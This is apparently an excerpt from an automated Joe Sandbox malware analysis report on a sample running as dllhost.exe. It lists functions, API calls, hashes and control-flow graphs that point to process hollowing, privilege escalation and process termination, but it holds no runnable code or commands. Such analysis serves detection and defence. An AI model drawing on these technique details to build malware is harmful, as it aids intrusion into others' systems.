                                            • Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
                                            • Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                                            • Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704
                                            Function 0000000140003668 Relevance: 9.1, APIs: 6, Instructions: 58memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 264 140003668-1400036bc GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 265 1400036be-1400036d1 K32EnumProcesses 264->265 266 1400036d3-1400036e2 265->266 267 14000371b-140003724 SleepEx 265->267 268 1400036e4-1400036e8 266->268 269 14000370c-140003717 266->269 267->265 270 1400036ea 268->270 271 1400036fb-1400036fe call 1400031c4 268->271 269->267 272 1400036ee-1400036f3 270->272 273 140003702 271->273 274 1400036f5-1400036f9 272->274 275 140003706-14000370a 272->275 273->275 274->271 274->272 275->268 275->269
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess$EnumProcessesSleep
                                            • String ID:
                                            • API String ID: 3676546796-0
                                            • Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                            • Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
                                            • Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                            • Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00
                                            Function 000000014000200C Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                            • String ID:
                                            • API String ID: 1323846700-0
                                            • Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                            • Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
                                            • Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                            • Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704
                                            Function 0000020175EEF598 Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 306 20175eef598-20175eef5b3 307 20175eef5b6-20175eef5df 306->307 308 20175eef5eb-20175eef5f4 307->308 309 20175eef5e1-20175eef5e6 307->309 311 20175eef60c 308->311 312 20175eef5f6-20175eef5f9 308->312 310 20175eef676-20175eef67f 309->310 310->307 313 20175eef685-20175eef69f 310->313 316 20175eef611-20175eef622 GetStdHandle 311->316 314 20175eef5fb-20175eef603 312->314 315 20175eef605-20175eef60a 312->315 314->316 315->316 317 20175eef624-20175eef62f GetFileType 316->317 318 20175eef651-20175eef669 316->318 317->318 319 20175eef631-20175eef63c 317->319 318->310 320 20175eef66b-20175eef66f 318->320 321 20175eef63e-20175eef643 319->321 322 20175eef645-20175eef648 319->322 320->310 321->310 322->310 323 20175eef64a-20175eef64f 322->323 323->310
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileHandleType
                                            • String ID:
                                            • API String ID: 3000768030-0
                                            • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                            • Instruction ID: b98c68d77c331fcd975fc70df693efe847ff76fe794ad7202922532bdd181eab
                                            • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                            • Instruction Fuzzy Hash: 3031A721620F4593F7608B149588269E650F34ABB0FA90709DB7A073F1CF75D972E380
                                            Function 0000020175EBF598 Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 288 20175ebf598-20175ebf5b3 289 20175ebf5b6-20175ebf5df 288->289 290 20175ebf5eb-20175ebf5f4 289->290 291 20175ebf5e1-20175ebf5e6 289->291 293 20175ebf60c 290->293 294 20175ebf5f6-20175ebf5f9 290->294 292 20175ebf676-20175ebf67f 291->292 292->289 295 20175ebf685-20175ebf69f 292->295 298 20175ebf611-20175ebf622 GetStdHandle 293->298 296 20175ebf5fb-20175ebf603 294->296 297 20175ebf605-20175ebf60a 294->297 296->298 297->298 299 20175ebf651-20175ebf669 298->299 300 20175ebf624-20175ebf62f GetFileType 298->300 299->292 301 20175ebf66b-20175ebf66f 299->301 300->299 302 20175ebf631-20175ebf63c 300->302 301->292 303 20175ebf63e-20175ebf643 302->303 304 20175ebf645-20175ebf648 302->304 303->292 304->292 305 20175ebf64a-20175ebf64f 304->305 305->292
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileHandleType
                                            • String ID:
                                            • API String ID: 3000768030-0
                                            • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                            • Instruction ID: 5ac0b5db2e106014af088a0f8558a96400db709701796753d2045dc924ff8550
                                            • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                            • Instruction Fuzzy Hash: D531C532610B4491EB648F249598669E650F345BB1F68130ADF7A073F5CF75DAB2C390
                                            Function 0000020175E82EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000003.2869389293.0000020175E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020175E80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_3_20175e80000_dllhost.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction ID: 20dc4435e6be8510b26ba3ef72537591977d597bfe5a4796eed37c2b292ee29b
                                            • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction Fuzzy Hash: 4D912572B4135487EB648F25D808B6DF392FB48F98F5491249E4907BAADF78F922C700
                                            Function 0000000140002D38 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 324 140002d38-140002d3c call 140002d4c 326 140002d41-140002d43 ExitProcess 324->326
                                            APIs
                                              • Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
                                              • Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
                                              • Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
                                              • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
                                              • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
                                              • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
                                              • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
                                              • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
                                              • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
                                              • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
                                              • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
                                              • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
                                              • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
                                              • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
                                              • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
                                              • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
                                            • ExitProcess.KERNEL32 ref: 0000000140002D43
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
                                            • String ID:
                                            • API String ID: 3805535264-0
                                            • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                            • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                                            • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                            • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

                                            Non-executed Functions

                                            Function 0000000140002434 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 317injectionthreadmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                            • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                            • API String ID: 1036100660-1371749706
                                            • Opcode ID: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                                            • Instruction ID: 2cc4599025b35cf826ffc418a6ccceb484f0f008c335a408c33283198f0c2c0b
                                            • Opcode Fuzzy Hash: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                                            • Instruction Fuzzy Hash: DAD15DB6705A8187EB65CF63F84479AB7A0F788BC4F004025EB8A47BA4DF78D595CB04
                                            Function 0000000140001274 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 136memoryregistrystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                                            • Instruction ID: 9172d928bd221ff1096d4d6b158f49becdf828e9a984a0b33df103b3ad9988b4
                                            • Opcode Fuzzy Hash: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                                            • Instruction Fuzzy Hash: 765138B2604B8086EB16DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710
                                            Function 0000020175EE2FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: 8c0e5deacabed4cf9c31043d7b341f9fac98672ffa78d73aeeecd7bfb5da8c22
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: 3FB1943222079882FB599F2AD808799E3A4F74CF84F545016DE4953BB6DFB5DEA0D340
                                            Function 000000014000217C Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                            • String ID:
                                            • API String ID: 4184240511-0
                                            • Opcode ID: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                                            • Instruction ID: e7c2dfd052af18fd3abcefe0f72c8446b9113f84b0d7c840ae7e34f71e75c1d0
                                            • Opcode Fuzzy Hash: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                                            • Instruction Fuzzy Hash: FF4146B2704A859AE711CF6AF8443DD63B1FB89B99F445225BF0A43A69DF38C159C304
                                            Function 0000020175EE84B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: e58e53bb0560a1c61573d65839fddbd40403bd54cd326b9909f486fd1295493b
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: 73313E72215B8086FB608F64E8547EDB364F798744F44412ADA4E47BAAEFB8C758C710
                                            Function 0000020175EB84B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: 128eb2a496c037ec8d177addb888730e817de25bc2eb69fe140a7b7d48984731
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: C9315E72205B80C6EB648F64E8547EEF3B4F784745F44402ADA4E47BAADFB8C658C710
                                            Function 0000020175EECD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: b0a4cca98dc60e5e70f03ad6866819465595d135fed29521f3a85077a481e3bc
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: 3E415336214F8086E760CF25E8447AEF7A4F788754F540216EB9D47BAADF78C665CB00
                                            Function 0000020175EBCD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: 8105350ced8ce2736936e32656651b93b31bc6a37a24404329990d8b1c7814ed
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: C4418236214F8086E760CF24E8447AEF3B4F788754F500116EA8D47BAADF78C665CB10
                                            Function 0000020175EEDA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: e74c786d4ee95284fa23afc9a9775dcd9a317430b91fb0f49741d3eee64eb5c4
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: 7EA1496272478049FBA09B75A6483ADFBA1E749794F0C4119DE482B6FADFB4C261E300
                                            Function 0000020175EBDA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: 9eaf2f96a7b0a3d4526249e45f2313ed66fb5d25df799432807b650bfa54fd06
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: C2A16B6270478049FBA0DB75E688BADEBB1E741795F044115DE8827BBBCFB8C261C710
                                            Function 000000014000151C Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
